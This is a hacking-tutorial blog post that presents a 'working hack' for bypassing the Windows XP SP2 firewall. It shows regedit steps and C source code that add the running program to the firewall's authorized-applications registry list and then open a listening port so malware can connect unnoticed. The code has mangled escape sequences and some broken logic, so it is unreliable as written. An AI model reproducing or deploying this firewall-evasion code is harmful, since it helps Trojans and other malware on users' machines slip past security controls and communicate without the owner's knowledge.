How to Bypass Windows XP Firewall using C program

Leave a comment
How to bypass Windows XP firewall using C
Bypass Windows XP Firewall

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.

Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SharedAccessParametersFirewallPolicyStandardProfile AuthorizedApplicationsList
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SharedAccessParametersFirewallPolicyStandardProfile AuthorizedApplicationsList

Add an entry key such as this one:
Name: C:chat.exe
Value: C:chat.exe:*:Enabled:chat


Source Code :-

#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include “Shlwapi.h”
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
“SYSTEM\CurrentControlSet\Services” “\SharedAccess\Parameters\FirewallPolicy\StandardProfile” “\AuthorizedApplications\List”,
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, “Simple server example with Anti SP2 firewall trick n”);
fprintf(stdout, ” This is not trojan n”);
fprintf(stdout, ” Opened port is :2001 n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosicen”);
fprintf(stdout, “Dedicated to Katka H. from Levoca n”);

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror(“accept”);
continue;
}
temp = send(new_fd, “Hello Worldrn”, strlen(“Hello Worldrn”), 0);
fprintf(stdout, “Sended: Hello Worldrn”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ‘’;
fprintf(stdout, “Recieved: %srn”, buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, “quit”))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */

Remove ** from the header files… easier to understand…Here we are just manipulating registry values using this program…
I hope you all liked It… If you have any queries ask me in form of comment…

Author Bio

Lokesh Singh

Hey Friends, This is Lokesh Singh. Your friend, who loves to share knowledge with friends as i believe in "Sharing is Caring". If you like our tutorials then you can send your gratitude by saying thanks or clicking any of our Sponsor ads.

Leave a Comment